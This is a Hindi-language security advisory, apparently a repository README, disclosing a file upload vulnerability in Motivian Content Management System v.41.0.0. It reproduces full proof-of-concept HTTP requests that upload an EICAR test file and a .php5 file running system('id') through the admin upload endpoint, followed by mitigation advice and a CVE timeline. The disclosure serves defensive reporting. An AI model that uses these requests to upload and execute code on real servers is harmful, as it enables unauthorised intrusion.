
यह रिपॉजिटरी Motivian Content Management System v.41.0.0 में खोजी गई एक सुरक्षा कमजोरी को उजागर करती है।
यह रिपॉजिटरी Motivian Content Management System v.41.0.0 में खोजी गई एक सुरक्षा भेद्यता को प्रकट करती है।
यह भेद्यता जिम्मेदार प्रकटीकरण प्रथाओं के अनुसार विक्रेता को और MITRE को सूचित की गई थी, जिसने एक अस्थायी CVE ID निर्दिष्ट किया। 45-दिवसीय प्रकटीकरण अवधि समाप्त होने के बाद विवरण सार्वजनिक किए जा रहे हैं।
Content/Gallery/ImagesMotivian Content Managment System v.41.0.0 में फ़ाइल अपलोड भेद्यता एक दूरस्थ हमलावर को Content/Gallery/Images घटक के माध्यम से दुर्भावनापूर्ण कोड वाली गढ़ी हुई एक्सटेंशन (जैसे .php, .png, .txt) वाली मनमानी फ़ाइलें अपलोड करने की अनुमति देती है।
भेद्यता का शोषण विभिन्न एक्सटेंशन वाली फ़ाइलें अपलोड करके किया जा सकता है। प्रदर्शन उद्देश्यों के लिए, दो प्रमाण-अवधारणा मामलों का उपयोग किया गया: एक में दुर्भावनापूर्ण कोड वाली .php फ़ाइल, और दूसरे में EICAR परीक्षण स्ट्रिंग वाली .txt फ़ाइल। दोनों फ़ाइलें Content/Gallery/Images घटक के माध्यम से अपलोड की गईं।
नीचे मुद्दे को प्रदर्शित करने के लिए उपयोग किए गए HTTP अनुरोधों और प्रतिक्रियाओं का पूर्ण लिप्यंतरण है:
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 808
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2oYL3KVZBlAQmYAA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="resFolderId"
-8
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="allowedExtensions"
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="hidePageComponents"
false
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="struts.token.name"
token
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="token"
M53N7SE0QE1Z4MZV4BRV59QW3TSEZ962
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="uploadResource"; filename="eicar.txt"
Content-Type: text/plain
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
------WebKitFormBoundary2oYL3KVZBlAQmYAA--
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 789
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLdWSMj4ASbAC9uOz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="resFolderId"
304802
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="allowedExtensions"
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="hidePageComponents"
false
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="struts.token.name"
token
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="token"
77PMJUJH5ZAQTPWRG5TQCLIOR9CUBK0M
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="uploadResource"; filename="test.php5"
Content-Type: application/octet-stream
<?php
echo system('id');
?>
------WebKitFormBoundaryLdWSMj4ASbAC9uOz--
HTTP/1.1 200 OK
Connection: close
Date: Thu, 06 Feb 2025 10:26:29 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 16729
उपयोगकर्ताओं को मनमानी फ़ाइलें अपलोड करने की अनुमति न दें। सख्त फ़ाइल सत्यापन (MIME प्रकार और सामग्री निरीक्षण) लागू करें, फ़ाइल नामों को यादृच्छिक बनाएं, और अपलोड निर्देशिकाओं को प्रतिबंधित करें।
| दिनांक | कार्रवाई |
|---|---|
| 2025-02-06 | CVE ID अनुरोध (CNA: MITRE) |
| 2025-04-02 | CVE ID निर्धारण |
| 2025-04-07 | विक्रेता को भेद्यताएं सूचित |
| 2025-05-31 | 45-दिन प्रकटीकरण अवधि (कुल 54 दिन) समाप्त होने के बाद सार्वजनिक प्रकटीकरण |
| 2025-06-04 | MITRE डेटाबेस और NIST/NVD पोर्टल में आधिकारिक पंजीकरण और प्रविष्टि |
द्वारा खोजा गया और जिम्मेदारी से प्रकट किया गया:
Francesco Marcuccio
साइबर सुरक्षा सलाहकार, प्रवेश परीक्षक
MITRE खोजकर्ता श्रेय इस प्रकार सूचीबद्ध:
Francesco Marcuccio
साइबर सुरक्षा सलाहकार, प्रवेश परीक्षक
यह CVE ID आधिकारिक रूप से PUBLISHED स्थिति में है। विश्लेषण के बाद NIST द्वारा इसे CVSS स्कोर के साथ अपडेट किया जाएगा।